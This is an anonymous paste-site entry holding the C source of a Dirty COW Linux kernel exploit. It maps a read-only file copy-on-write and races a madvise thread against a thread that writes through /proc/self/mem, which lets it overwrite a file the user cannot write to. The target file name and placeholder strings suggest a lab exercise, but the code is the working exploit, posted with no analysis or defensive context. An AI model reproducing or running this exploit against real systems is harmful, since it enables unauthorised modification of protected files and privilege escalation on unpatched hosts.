TEXT   56

Untitled

Guest on 3rd May 2022 12:00:15 PM

  1. #include <sys/mman.h>
  2. #include <fcntl.h>
  3. #include <pthread.h>
  4. #include <sys/stat.h>
  5. #include <string.h>
  6.  
  7. void *map;
  8. void *writeThread(void *arg);
  9. void *madviseThread(void *arg);
  10.  
  11. int main(int argc, char *argv[])
  12. {
  13.   pthread_t pth1,pth2;
  14.   struct stat st;
  15.   int file_size;
  16.  
  17.   // Open the target file in the read-only mode.
  18.   int f=open("/zzz", O_RDONLY);
  19.  
  20.   // Map the file to COW memory using MAP_PRIVATE.
  21.   fstat(f, &st);
  22.   file_size = st.st_size;
  23.   map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);
  24.  
  25.   // Find the position of the target area
  26.   char *position = strstr(map, "222222");                        
  27.  
  28.   // We have to do the attack using two threads.
  29.   pthread_create(&pth1, NULL, madviseThread, (void  *)file_size);
  30.   pthread_create(&pth2, NULL, writeThread, position);            
  31.  
  32.   // Wait for the threads to finish.
  33.   pthread_join(pth1, NULL);
  34.   pthread_join(pth2, NULL);
  35.   return 0;
  36. }
  37.  
  38. void *writeThread(void *arg)
  39. {
  40.   char *content= "******";
  41.   off_t offset = (off_t) arg;
  42.  
  43.   int f=open("/proc/self/mem", O_RDWR);
  44.   while(1) {
  45.     // Move the file pointer to the corresponding position.
  46.     lseek(f, offset, SEEK_SET);
  47.     // Write to the memory.
  48.     write(f, content, strlen(content));
  49.   }
  50. }
  51.  
  52. void *madviseThread(void *arg)
  53. {
  54.   int file_size = (int) arg;
  55.   while(1){
  56.       madvise(map, file_size, MADV_DONTNEED);
  57.   }
  58. }

Raw Paste

Login or Register to edit or fork this paste. It's free.